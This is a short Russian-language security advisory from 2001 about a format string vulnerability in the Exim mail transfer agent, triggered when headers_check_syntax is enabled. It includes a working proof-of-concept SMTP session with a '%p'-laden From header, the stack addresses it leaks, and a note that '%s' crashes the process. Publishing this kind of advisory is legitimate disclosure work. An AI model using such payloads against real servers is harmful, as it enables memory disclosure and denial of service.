Security Lab

Ошибка форматной стоки в Exim

Дата публикации:07.06.2001
Дата изменения:17.10.2006
Всего просмотров:3234
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание:

Exim – это агент передачи сообщений (Message Transfert Agent) использующийся в UNIX системах подключенных к интернету. Уязвимость работает только при включенной опции headers_check_syntax (по умолчанию она отключена).

Exploit:

Делаем следующее:

lez:~$ /usr/sbin/exim -bS

mail from:lez@lez

rcpt to:hax0r@lez

data

From:@@%p%p%p%p%p%p%p%p%p%p

После этого, в ответе мы увидим:

550 Syntax error in 'From' header: domain missing or malformed: failing address is:

@@0x80beba00x804d2690x80be6600x80be6680x80bd050(nil)(nil)(nil)(nil)0x80b9d40

Если изменить %p's на %s, то получим ошибку segfault.

Для устранения не включайте опцию headers_check_syntax.
 

Ссылки: Exploit